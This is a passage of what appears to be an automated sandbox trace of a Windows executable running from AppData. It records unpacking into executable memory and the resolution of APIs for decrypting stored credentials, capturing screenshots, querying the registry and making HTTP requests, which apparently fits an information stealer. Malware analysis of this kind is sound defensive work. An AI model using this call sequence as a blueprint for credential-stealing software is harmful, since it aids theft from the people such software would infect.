lpflOldProtect=0x18ee3c*=0x4) returned 1 [0132.160] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76d30000 [0132.160] GetProcAddress (hModule=0x76d30000, lpProcName="GlobalAlloc") returned 0x76d4588e [0132.161] GetProcAddress (hModule=0x76d30000, lpProcName="GetLastError") returned 0x76d411c0 [0132.161] GetProcAddress (hModule=0x76d30000, lpProcName="Sleep") returned 0x76d410ff [0132.161] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualAlloc") returned 0x76d41856 [0132.161] GetProcAddress (hModule=0x76d30000, lpProcName="CreateToolhelp32Snapshot") returned 0x76d6735f [0132.161] GetProcAddress (hModule=0x76d30000, lpProcName="Module32First") returned 0x76dc5cd9 [0132.161] GetProcAddress (hModule=0x76d30000, lpProcName="CloseHandle") returned 0x76d41410 [0132.161] CreateToolhelp32Snapshot (dwFlags=0x8, th32ProcessID=0x0) returned 0x30 [0132.163] Module32First (hSnapshot=0x30, lpme=0x18f438) returned 1 [0132.164] VirtualAlloc (lpAddress=0x0, dwSize=0x88e50, flAllocationType=0x1000, flProtect=0x40) returned 0x2e40000 [0132.193] GetProcAddress (hModule=0x76d30000, lpProcName="LoadLibraryA") returned 0x76d449d7 [0132.194] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76d30000 [0132.194] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualAlloc") returned 0x76d41856 [0132.194] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualProtect") returned 0x76d4435f [0132.194] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualFree") returned 0x76d4186e [0132.194] GetProcAddress (hModule=0x76d30000, lpProcName="GetVersionExA") returned 0x76d43519 [0132.194] GetProcAddress (hModule=0x76d30000, lpProcName="TerminateProcess") returned 0x76d5d802 [0132.194] GetProcAddress (hModule=0x76d30000, lpProcName="ExitProcess") returned 0x76d47a10 [0132.194] GetProcAddress (hModule=0x76d30000, lpProcName="SetErrorMode") returned 0x76d41b00 [0132.194] SetErrorMode (uMode=0x400) returned 0x0 [0132.194] SetErrorMode (uMode=0x0) returned 0x400 [0132.194] GetVersionExA (in: lpVersionInformation=0x18e368*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x65006564, dwMinorVersion=0x7373, dwBuildNumber=0x3, dwPlatformId=0xffffffff, szCSDVersion="s}Çw") | out: lpVersionInformation=0x18e368*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0132.194] VirtualAlloc (lpAddress=0x0, dwSize=0x88000, flAllocationType=0x1000, flProtect=0x4) returned 0x2ed0000 [0132.206] VirtualProtect (in: lpAddress=0x400000, dwSize=0x8d000, flNewProtect=0x40, lpflOldProtect=0x18f3f0 | out: lpflOldProtect=0x18f3f0*=0x2) returned 1 [0132.409] VirtualFree (lpAddress=0x2ed0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0132.412] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x76d30000 [0132.412] GetProcAddress (hModule=0x76d30000, lpProcName="CreateDirectoryA") returned 0x76d6d526 [0132.412] GetProcAddress (hModule=0x76d30000, lpProcName="GetLastError") returned 0x76d411c0 [0132.412] GetProcAddress (hModule=0x76d30000, lpProcName="CreateMutexA") returned 0x76d44c6b [0132.412] GetProcAddress (hModule=0x76d30000, lpProcName="CloseHandle") returned 0x76d41410 [0132.413] GetProcAddress (hModule=0x76d30000, lpProcName="WriteFile") returned 0x76d41282 [0132.413] GetProcAddress (hModule=0x76d30000, lpProcName="CreateFileA") returned 0x76d453c6 [0132.413] GetProcAddress (hModule=0x76d30000, lpProcName="MultiByteToWideChar") returned 0x76d4192e [0132.413] GetProcAddress (hModule=0x76d30000, lpProcName="ReadFile") returned 0x76d43ed3 [0132.413] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileSize") returned 0x76d4196e [0132.413] GetProcAddress (hModule=0x76d30000, lpProcName="GetVersionExA") returned 0x76d43519 [0132.413] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileSizeEx") returned 0x76d459e2 [0132.413] GetProcAddress (hModule=0x76d30000, lpProcName="Process32Next") returned 0x76d688a4 [0132.413] GetProcAddress (hModule=0x76d30000, lpProcName="Process32First") returned 0x76d68ae7 [0132.413] GetProcAddress (hModule=0x76d30000, lpProcName="CreateToolhelp32Snapshot") returned 0x76d6735f [0132.413] GetProcAddress (hModule=0x76d30000, lpProcName="TerminateProcess") returned 0x76d5d802 [0132.413] GetProcAddress (hModule=0x76d30000, lpProcName="OpenProcess") returned 0x76d41986 [0132.413] GetProcAddress (hModule=0x76d30000, lpProcName="GetProcAddress") returned 0x76d41222 [0132.413] GetProcAddress (hModule=0x76d30000, lpProcName="LoadLibraryA") returned 0x76d449d7 [0132.413] GetProcAddress (hModule=0x76d30000, lpProcName="FileTimeToSystemTime") returned 0x76d4542c [0132.413] GetProcAddress (hModule=0x76d30000, lpProcName="FreeLibrary") returned 0x76d434c8 [0132.413] GetProcAddress (hModule=0x76d30000, lpProcName="GetPrivateProfileSectionNamesA") returned 0x76dba1c9 [0132.413] GetProcAddress (hModule=0x76d30000, lpProcName="lstrcatA") returned 0x76d62b7a [0132.413] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileAttributesW") returned 0x76d41b18 [0132.413] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeCriticalSection") returned 0x77c72c42 [0132.414] GetProcAddress (hModule=0x76d30000, lpProcName="InterlockedCompareExchange") returned 0x76d41484 [0132.414] GetProcAddress (hModule=0x76d30000, lpProcName="DeleteCriticalSection") returned 0x77c745f5 [0132.414] GetProcAddress (hModule=0x76d30000, lpProcName="EnterCriticalSection") returned 0x77c622b0 [0132.414] GetProcAddress (hModule=0x76d30000, lpProcName="LeaveCriticalSection") returned 0x77c62270 [0132.414] GetProcAddress (hModule=0x76d30000, lpProcName="AreFileApisANSI") returned 0x76dc40d1 [0132.414] GetProcAddress (hModule=0x76d30000, lpProcName="SetFilePointer") returned 0x76d417d1 [0132.414] GetProcAddress (hModule=0x76d30000, lpProcName="SetEndOfFile") returned 0x76d5ce2e [0132.414] GetProcAddress (hModule=0x76d30000, lpProcName="FlushFileBuffers") returned 0x76d4469b [0132.414] GetProcAddress (hModule=0x76d30000, lpProcName="UnlockFile") returned 0x76d6cf36 [0132.414] GetProcAddress (hModule=0x76d30000, lpProcName="LockFile") returned 0x76d6cf1e [0132.414] GetProcAddress (hModule=0x76d30000, lpProcName="LockFileEx") returned 0x76d6d57c [0132.414] GetProcAddress (hModule=0x76d30000, lpProcName="UnlockFileEx") returned 0x76d6d594 [0132.414] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileAttributesA") returned 0x76d45414 [0132.414] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileAttributesExW") returned 0x76d44574 [0132.414] GetProcAddress (hModule=0x76d30000, lpProcName="SetCurrentDirectoryA") returned 0x76d51834 [0132.414] GetProcAddress (hModule=0x76d30000, lpProcName="QueryPerformanceCounter") returned 0x76d41725 [0132.414] GetProcAddress (hModule=0x76d30000, lpProcName="GetTickCount") returned 0x76d4110c [0132.414] GetProcAddress (hModule=0x76d30000, lpProcName="GetSystemTime") returned 0x76d45a96 [0132.414] GetProcAddress (hModule=0x76d30000, lpProcName="CopyFileW") returned 0x76d6830d [0132.414] GetProcAddress (hModule=0x76d30000, lpProcName="UnmapViewOfFile") returned 0x76d41826 [0132.415] GetProcAddress (hModule=0x76d30000, lpProcName="GetTempPathA") returned 0x76d6276c [0132.415] GetProcAddress (hModule=0x76d30000, lpProcName="GetTempPathW") returned 0x76d5d4dc [0132.415] GetProcAddress (hModule=0x76d30000, lpProcName="FormatMessageA") returned 0x76d65fbd [0132.415] GetProcAddress (hModule=0x76d30000, lpProcName="FormatMessageW") returned 0x76d44620 [0132.415] GetProcAddress (hModule=0x76d30000, lpProcName="GetFullPathNameA") returned 0x76d4e2c1 [0132.415] GetProcAddress (hModule=0x76d30000, lpProcName="GetFullPathNameW") returned 0x76d440d4 [0132.415] GetProcAddress (hModule=0x76d30000, lpProcName="GetDiskFreeSpaceA") returned 0x76dc433f [0132.415] GetProcAddress (hModule=0x76d30000, lpProcName="GetDiskFreeSpaceW") returned 0x76d5f7aa [0132.415] GetProcAddress (hModule=0x76d30000, lpProcName="CreateFileW") returned 0x76d43f5c [0132.415] GetProcAddress (hModule=0x76d30000, lpProcName="GetSystemInfo") returned 0x76d449ca [0132.415] GetProcAddress (hModule=0x76d30000, lpProcName="MapViewOfFile") returned 0x76d418f1 [0132.415] GetProcAddress (hModule=0x76d30000, lpProcName="CreateFileMappingA") returned 0x76d45506 [0132.415] GetProcAddress (hModule=0x76d30000, lpProcName="GetComputerNameA") returned 0x76d5b6e0 [0132.415] GetProcAddress (hModule=0x76d30000, lpProcName="IsWow64Process") returned 0x76d4195e [0132.415] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcess") returned 0x76d41809 [0132.415] GetProcAddress (hModule=0x76d30000, lpProcName="GlobalMemoryStatus") returned 0x76d48b6d [0132.415] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleHandleA") returned 0x76d41245 [0132.415] GetProcAddress (hModule=0x76d30000, lpProcName="GetUserDefaultLocaleName") returned 0x76dc47c1 [0132.415] GetProcAddress (hModule=0x76d30000, lpProcName="TzSpecificLocalTimeToSystemTime") returned 0x76d6066a [0132.415] GetProcAddress (hModule=0x76d30000, lpProcName="GetTimeZoneInformation") returned 0x76d4465a [0132.416] GetProcAddress (hModule=0x76d30000, lpProcName="GetLocaleInfoA") returned 0x76d5d5e5 [0132.416] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileInformationByHandle") returned 0x76d453ae [0132.416] GetProcAddress (hModule=0x76d30000, lpProcName="SystemTimeToFileTime") returned 0x76d45a7e [0132.416] GetProcAddress (hModule=0x76d30000, lpProcName="GetLocalTime") returned 0x76d45aa6 [0132.416] GetProcAddress (hModule=0x76d30000, lpProcName="CompareStringW") returned 0x76d43bca [0132.416] GetProcAddress (hModule=0x76d30000, lpProcName="SetStdHandle") returned 0x76dc454f [0132.416] GetProcAddress (hModule=0x76d30000, lpProcName="IsValidLocale") returned 0x76d5ce46 [0132.416] GetProcAddress (hModule=0x76d30000, lpProcName="EnumSystemLocalesA") returned 0x76d6287b [0132.416] GetProcAddress (hModule=0x76d30000, lpProcName="GetUserDefaultLCID") returned 0x76d43da5 [0132.416] GetProcAddress (hModule=0x76d30000, lpProcName="GetLocaleInfoW") returned 0x76d43c42 [0132.416] GetProcAddress (hModule=0x76d30000, lpProcName="GetStringTypeW") returned 0x76d41946 [0132.416] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleFileNameA") returned 0x76d414b1 [0132.416] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcessId") returned 0x76d411f8 [0132.416] GetProcAddress (hModule=0x76d30000, lpProcName="Sleep") returned 0x76d410ff [0132.416] GetProcAddress (hModule=0x76d30000, lpProcName="DeleteFileA") returned 0x76d45444 [0132.416] GetProcAddress (hModule=0x76d30000, lpProcName="ExitProcess") returned 0x76d47a10 [0132.416] GetProcAddress (hModule=0x76d30000, lpProcName="GetLogicalDriveStringsA") returned 0x76d4e4dc [0132.416] GetProcAddress (hModule=0x76d30000, lpProcName="GetDriveTypeA") returned 0x76d5ef75 [0132.417] GetProcAddress (hModule=0x76d30000, lpProcName="LoadLibraryW") returned 0x76d4492b [0132.417] GetProcAddress (hModule=0x76d30000, lpProcName="CreateDirectoryW") returned 0x76d44259 [0132.417] GetProcAddress (hModule=0x76d30000, lpProcName="lstrcpyW") returned 0x76d63102 [0132.417] GetProcAddress (hModule=0x76d30000, lpProcName="lstrlenA") returned 0x76d45a4b [0132.417] GetProcAddress (hModule=0x76d30000, lpProcName="lstrcatW") returned 0x76d6828e [0132.417] GetProcAddress (hModule=0x76d30000, lpProcName="FindFirstFileW") returned 0x76d44435 [0132.417] GetProcAddress (hModule=0x76d30000, lpProcName="lstrcmpW") returned 0x76d45929 [0132.417] GetProcAddress (hModule=0x76d30000, lpProcName="DeleteFileW") returned 0x76d489b3 [0132.417] GetProcAddress (hModule=0x76d30000, lpProcName="FindNextFileW") returned 0x76d454ee [0132.417] GetProcAddress (hModule=0x76d30000, lpProcName="FindClose") returned 0x76d44442 [0132.417] GetProcAddress (hModule=0x76d30000, lpProcName="HeapFree") returned 0x76d414c9 [0132.418] GetProcAddress (hModule=0x76d30000, lpProcName="GetProcessHeap") returned 0x76d414e9 [0132.418] GetProcAddress (hModule=0x76d30000, lpProcName="HeapAlloc") returned 0x77c6e026 [0132.418] GetProcAddress (hModule=0x76d30000, lpProcName="WideCharToMultiByte") returned 0x76d4170d [0132.418] GetProcAddress (hModule=0x76d30000, lpProcName="GetEnvironmentStringsW") returned 0x76d451e3 [0132.418] GetProcAddress (hModule=0x76d30000, lpProcName="FreeEnvironmentStringsW") returned 0x76d451cb [0132.418] GetProcAddress (hModule=0x76d30000, lpProcName="SetEnvironmentVariableA") returned 0x76d4e331 [0132.418] GetProcAddress (hModule=0x76d30000, lpProcName="SetEnvironmentVariableW") returned 0x76d489f1 [0132.418] GetProcAddress (hModule=0x76d30000, lpProcName="GetConsoleMode") returned 0x76d41328 [0132.418] GetProcAddress (hModule=0x76d30000, lpProcName="GetConsoleCP") returned 0x76de7bff [0132.418] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleFileNameW") returned 0x76d44950 [0132.418] GetProcAddress (hModule=0x76d30000, lpProcName="IsValidCodePage") returned 0x76d44493 [0132.418] GetProcAddress (hModule=0x76d30000, lpProcName="LocalFree") returned 0x76d42d3c [0132.418] GetProcAddress (hModule=0x76d30000, lpProcName="LocalAlloc") returned 0x76d4168c [0132.418] GetProcAddress (hModule=0x76d30000, lpProcName="GetSystemTimeAsFileTime") returned 0x76d43509 [0132.418] GetProcAddress (hModule=0x76d30000, lpProcName="GetOEMCP") returned 0x76d6d1a1 [0132.418] GetProcAddress (hModule=0x76d30000, lpProcName="GetACP") returned 0x76d4179c [0132.418] GetProcAddress (hModule=0x76d30000, lpProcName="HeapCreate") returned 0x76d44a2d [0132.418] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileType") returned 0x76d43531 [0132.418] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeCriticalSectionAndSpinCount") returned 0x76d41916 [0132.418] GetProcAddress (hModule=0x76d30000, lpProcName="GetStdHandle") returned 0x76d451b3 [0132.419] GetProcAddress (hModule=0x76d30000, lpProcName="SetHandleCount") returned 0x76d4cb29 [0132.419] GetProcAddress (hModule=0x76d30000, lpProcName="HeapSize") returned 0x77c73002 [0132.419] GetProcAddress (hModule=0x76d30000, lpProcName="IsDebuggerPresent") returned 0x76d44a5d [0132.419] GetProcAddress (hModule=0x76d30000, lpProcName="SetUnhandledExceptionFilter") returned 0x76d487c9 [0132.419] GetProcAddress (hModule=0x76d30000, lpProcName="UnhandledExceptionFilter") returned 0x76d6772f [0132.419] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentThreadId") returned 0x76d41450 [0132.419] GetProcAddress (hModule=0x76d30000, lpProcName="SetLastError") returned 0x76d411a9 [0132.419] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleHandleW") returned 0x76d434b0 [0132.419] GetProcAddress (hModule=0x76d30000, lpProcName="TlsFree") returned 0x76d43587 [0132.419] GetProcAddress (hModule=0x76d30000, lpProcName="TlsSetValue") returned 0x76d414fb [0132.419] GetProcAddress (hModule=0x76d30000, lpProcName="TlsGetValue") returned 0x76d411e0 [0132.419] GetProcAddress (hModule=0x76d30000, lpProcName="TlsAlloc") returned 0x76d449ad [0132.419] GetProcAddress (hModule=0x76d30000, lpProcName="IsProcessorFeaturePresent") returned 0x76d45235 [0132.419] GetProcAddress (hModule=0x76d30000, lpProcName="GetCPInfo") returned 0x76d45189 [0132.419] GetProcAddress (hModule=0x76d30000, lpProcName="LCMapStringW") returned 0x76d417b9 [0132.419] GetProcAddress (hModule=0x76d30000, lpProcName="GetStartupInfoW") returned 0x76d44d40 [0132.419] GetProcAddress (hModule=0x76d30000, lpProcName="HeapSetInformation") returned 0x76d45651 [0132.420] GetProcAddress (hModule=0x76d30000, lpProcName="GetCommandLineA") returned 0x76d451a1 [0132.420] GetProcAddress (hModule=0x76d30000, lpProcName="HeapReAlloc") returned 0x77c81f6e [0132.420] GetProcAddress (hModule=0x76d30000, lpProcName="RtlUnwind") returned 0x76d6d1c3 [0132.420] GetProcAddress (hModule=0x76d30000, lpProcName="RaiseException") returned 0x76d458a6 [0132.420] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0132.420] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0132.420] GetProcAddress (hModule=0x76d30000, lpProcName="InterlockedExchange") returned 0x76d41462 [0132.420] GetProcAddress (hModule=0x76d30000, lpProcName="InterlockedDecrement") returned 0x76d413f0 [0132.420] GetProcAddress (hModule=0x76d30000, lpProcName="InterlockedIncrement") returned 0x76d41400 [0132.420] GetProcAddress (hModule=0x76d30000, lpProcName="WriteConsoleW") returned 0x76d67aca [0132.420] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x77130000 [0132.445] GetProcAddress (hModule=0x77130000, lpProcName="GetSystemMetrics") returned 0x77147d2f [0132.445] GetProcAddress (hModule=0x77130000, lpProcName="wsprintfA") returned 0x7715ae5f [0132.445] GetProcAddress (hModule=0x77130000, lpProcName="CharToOemA") returned 0x77154fee [0132.445] GetProcAddress (hModule=0x77130000, lpProcName="EnumDisplayDevicesW") returned 0x7716e567 [0132.445] GetProcAddress (hModule=0x77130000, lpProcName="GetDC") returned 0x771472c4 [0132.445] GetProcAddress (hModule=0x77130000, lpProcName="ReleaseDC") returned 0x77147446 [0132.445] GetProcAddress (hModule=0x77130000, lpProcName="GetKeyboardLayoutList") returned 0x77152e69 [0132.445] GetProcAddress (hModule=0x77130000, lpProcName="GetDesktopWindow") returned 0x77150a19 [0132.446] LoadLibraryA (lpLibFileName="GDI32.dll") returned 0x770a0000 [0132.446] GetProcAddress (hModule=0x770a0000, lpProcName="CreateCompatibleBitmap") returned 0x770b5f49 [0132.446] GetProcAddress (hModule=0x770a0000, lpProcName="SelectObject") returned 0x770b4f70 [0132.446] GetProcAddress (hModule=0x770a0000, lpProcName="BitBlt") returned 0x770b5ea6 [0132.446] GetProcAddress (hModule=0x770a0000, lpProcName="DeleteObject") returned 0x770b5689 [0132.446] GetProcAddress (hModule=0x770a0000, lpProcName="CreateDCA") returned 0x770b7bcc [0132.446] GetProcAddress (hModule=0x770a0000, lpProcName="GetDeviceCaps") returned 0x770b4de0 [0132.446] GetProcAddress (hModule=0x770a0000, lpProcName="CreateCompatibleDC") returned 0x770b54f4 [0132.446] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x77710000 [0132.446] GetProcAddress (hModule=0x77710000, lpProcName="RegOpenKeyExA") returned 0x77724907 [0132.446] GetProcAddress (hModule=0x77710000, lpProcName="RegQueryValueExA") returned 0x777248ef [0132.447] GetProcAddress (hModule=0x77710000, lpProcName="RegEnumKeyExA") returned 0x77721481 [0132.447] GetProcAddress (hModule=0x77710000, lpProcName="GetUserNameA") returned 0x7773a4b4 [0132.447] GetProcAddress (hModule=0x77710000, lpProcName="GetCurrentHwProfileA") returned 0x777511f8 [0132.447] GetProcAddress (hModule=0x77710000, lpProcName="RegOpenKeyExW") returned 0x7772468d [0132.447] GetProcAddress (hModule=0x77710000, lpProcName="RegGetValueW") returned 0x77720e47 [0132.447] GetProcAddress (hModule=0x77710000, lpProcName="RegCloseKey") returned 0x7772469d [0132.447] GetProcAddress (hModule=0x77710000, lpProcName="RegGetValueA") returned 0x7771a9dd [0132.447] LoadLibraryA (lpLibFileName="SHELL32.dll") returned 0x759d0000 [0132.451] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathA") returned 0x75ae7804 [0132.451] GetProcAddress (hModule=0x759d0000, lpProcName="ShellExecuteA") returned 0x75c17078 [0132.451] LoadLibraryA (lpLibFileName="ole32.dll") returned 0x76620000 [0132.454] GetProcAddress (hModule=0x76620000, lpProcName="CoCreateInstance") returned 0x76669d0b [0132.454] GetProcAddress (hModule=0x76620000, lpProcName="CoUninitialize") returned 0x766686d3 [0132.454] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x772f0000 [0132.454] GetProcAddress (hModule=0x772f0000, lpProcName="PathMatchSpecW") returned 0x773086f7 [0132.454] LoadLibraryA (lpLibFileName="CRYPT32.dll") returned 0x77550000 [0132.457] GetProcAddress (hModule=0x77550000, lpProcName="CryptStringToBinaryA") returned 0x77585d77 [0132.457] GetProcAddress (hModule=0x77550000, lpProcName="CryptUnprotectData") returned 0x77585a7f [0132.457] LoadLibraryA (lpLibFileName="PSAPI.DLL") returned 0x77060000 [0132.458] GetProcAddress (hModule=0x77060000, lpProcName="GetModuleFileNameExA") returned 0x770615bc [0132.458] GetProcAddress (hModule=0x77060000, lpProcName="EnumProcessModules") returned 0x77061408 [0132.458] GetProcAddress (hModule=0x77060000, lpProcName="GetModuleBaseNameA") returned 0x770615a4 [0132.458] LoadLibraryA (lpLibFileName="WININET.dll") returned 0x758d0000 [0132.463] GetProcAddress (hModule=0x758d0000, lpProcName="InternetConnectA") returned 0x758f49e9 [0132.463] GetProcAddress (hModule=0x758d0000, lpProcName="HttpOpenRequestA") returned 0x758f4c7d [0132.463] GetProcAddress (hModule=0x758d0000, lpProcName="HttpSendRequestA") returned 0x759618f8 [0132.463] GetProcAddress (hModule=0x758d0000, lpProcName="InternetCloseHandle") returned 0x758eab49 [0132.464] GetProcAddress (hModule=0x758d0000, lpProcName="InternetSetFilePointer") returned 0x7594af16 [0132.464] GetProcAddress (hModule=0x758d0000, lpProcName="InternetReadFile") returned 0x758eb406 [0132.464] GetProcAddress (hModule=0x758d0000, lpProcName="HttpQueryInfoA") returned 0x758ea33e [0132.464] GetProcAddress (hModule=0x758d0000, lpProcName="HttpAddRequestHeadersA") returned 0x758edcd2 [0132.464] GetProcAddress (hModule=0x758d0000, lpProcName="InternetSetOptionA") returned 0x758e75e8 [0132.464] GetProcAddress (hModule=0x758d0000, lpProcName="InternetOpenA") returned 0x758ff18e [0132.464] GetProcAddress (hModule=0x758d0000, lpProcName="InternetOpenUrlA") returned 0x759130f1 [0132.464] LoadLibraryA (lpLibFileName="gdiplus.dll") returned 0x73e00000 [0137.822] GetProcAddress (hModule=0x73e00000, lpProcName="GdipCreateBitmapFromHBITMAP") returned 0x73e36671 [0137.822] GetProcAddress (hModule=0x73e00000, lpProcName="GdipSaveImageToFile") returned 0x73e341fd [0137.822] GetProcAddress (hModule=0x73e00000, lpProcName="GdipGetImageEncoders") returned 0x73e4228c [0137.822] GetProcAddress (hModule=0x73e00000, lpProcName="GdiplusShutdown") returned 0x73e256be [0137.823] GetProcAddress (hModule=0x73e00000, lpProcName="GdiplusStartup") returned 0x73e25600 [0137.823] GetProcAddress (hModule=0x73e00000, lpProcName="GdipCloneImage") returned 0x73e34bfa [0137.823] GetProcAddress (hModule=0x73e00000, lpProcName="GdipDisposeImage") returned 0x73e34cc8 [0137.823] GetProcAddress (hModule=0x73e00000, lpProcName="GdipAlloc") returned 0x73e42437 [0137.823] GetProcAddress (hModule=0x73e00000, lpProcName="GdipGetImageEncodersSize") returned 0x73e42203 [0137.823] GetProcAddress (hModule=0x73e00000, lpProcName="GdipFree") returned 0x73e424b2 [0137.823] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x74640000 [0137.826] GetProcAddress (hModule=0x74640000, lpProcName="BCryptDecrypt") returned 0x746418b8 [0137.826] GetProcAddress (hModule=0x74640000, lpProcName="BCryptCloseAlgorithmProvider") returned 0x7464234e [0137.826] GetProcAddress (hModule=0x74640000, lpProcName="BCryptDestroyKey") returned 0x74641f40 [0137.826] GetProcAddress (hModule=0x74640000, lpProcName="BCryptGenerateSymmetricKey") returned 0x74641fbc [0137.827] GetProcAddress (hModule=0x74640000, lpProcName="BCryptSetProperty") returned 0x746420d4 [0137.827] GetProcAddress (hModule=0x74640000, lpProcName="BCryptOpenAlgorithmProvider") returned 0x74642d30 [0137.827] LoadLibraryA (lpLibFileName="msvcr100.dll") returned 0x754d0000 [0137.831] GetProcAddress (hModule=0x754d0000, lpProcName="atexit") returned 0x754ec544 [0137.831] atexit (param_1=0x2e40920) returned 0 [0137.831] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18f404 | out: lpSystemTimeAsFileTime=0x18f404*(dwLowDateTime=0xc6a6c110, dwHighDateTime=0x1d62438)) [0137.831] GetCurrentProcessId () returned 0x93c [0137.831] GetCurrentThreadId () returned 0x95c [0137.831] GetTickCount () returned 0x11563e2 [0137.831] QueryPerformanceCounter (in: lpPerformanceCount=0x18f3fc | out: lpPerformanceCount=0x18f3fc*=25821847921) returned 1 [0137.831] GetStartupInfoW (in: lpStartupInfo=0x18f3a8 | out: lpStartupInfo=0x18f3a8*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\f2685878-c1d9-47fc-b7a6-e4dee8a92594\\5.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x18f40c, hStdError=0x4669d1)) [0137.831] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0137.831] HeapCreate (flOptions=0x0, dwInitialSize=0x1000, dwMaximumSize=0x0) returned 0x2f0000 [0137.832] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0137.832] GetProcAddress (hModule=0x76d30000, lpProcName="FlsAlloc") returned 0x76d44f2b [0137.832] GetProcAddress (hModule=0x76d30000, lpProcName="FlsGetValue") returned 0x76d41252 [0137.832] GetProcAddress (hModule=0x76d30000, lpProcName="FlsSetValue") returned 0x76d44208 [0137.832] GetProcAddress (hModule=0x76d30000, lpProcName="FlsFree") returned 0x76d4359f [0137.833] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x214) returned 0x2f07d0 [0137.833] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0137.833] GetCurrentThreadId () returned 0x95c [0137.834] GetStartupInfoW (in: lpStartupInfo=0x18f344 | out: lpStartupInfo=0x18f344*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\f2685878-c1d9-47fc-b7a6-e4dee8a92594\\5.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x45e180, hStdOutput=0x45e4b9, hStdError=0x2f07d0)) [0137.834] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x800) returned 0x2f09f0 [0137.834] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0137.834] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0137.834] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0137.834] SetHandleCount (uNumber=0x20) returned 0x20 [0137.834] GetCommandLineA () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\f2685878-c1d9-47fc-b7a6-e4dee8a92594\\5.exe\" " [0137.834] GetEnvironmentStringsW () returned 0x375900* [0137.834] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1381, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1381 [0137.834] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x0, Size=0x565) returned 0x2f11f8 [0137.834] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1381, lpMultiByteStr=0x2f11f8, cbMultiByte=1381, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 1381 [0137.834] FreeEnvironmentStringsW (penv=0x375900) returned 1 [0137.834] GetLastError () returned 0x0 [0137.834] SetLastError (dwErrCode=0x0) [0137.834] GetLastError () returned 0x0 [0137.835] SetLastError (dwErrCode=0x0) [0137.835] GetLastError () returned 0x0 [0137.835] SetLastError (dwErrCode=0x0) [0137.835] GetACP () returned 0x4e4 [0137.835] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x0, Size=0x220) returned 0x2f1768 [0137.835] GetLastError () returned 0x0 [0137.835] SetLastError (dwErrCode=0x0) [0137.835] IsValidCodePage (CodePage=0x4e4) returned 1 [0137.835] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f30c | out: lpCPInfo=0x18f30c) returned 1 [0137.835] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18edd8 | out: lpCPInfo=0x18edd8) returned 1 [0137.835] GetLastError () returned 0x0 [0137.835] SetLastError (dwErrCode=0x0) [0137.835] MultiByteToWideChar (in: CodePage=0x4e4, 